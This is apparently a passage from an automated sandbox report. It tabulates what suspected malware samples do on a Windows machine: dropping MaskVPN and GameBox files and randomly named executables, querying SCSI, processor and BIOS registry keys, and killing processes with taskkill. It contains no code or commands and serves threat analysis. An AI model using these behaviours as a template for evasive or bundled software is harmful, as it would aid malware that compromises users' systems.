| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-OFTF0.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-H3VBI.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-O98DU.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\uRay4026UiM7xMPbYxI6iz8R.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-29RPF.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-J9664.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-HNPTC.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-6P63M.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-S32AN.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-9GMUN.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-TQ18K.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-594IN.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-JTN39.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-TN9BK.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\uRay4026UiM7xMPbYxI6iz8R.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File created | C:\Windows\Installer\f762288.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f762288.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI491B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
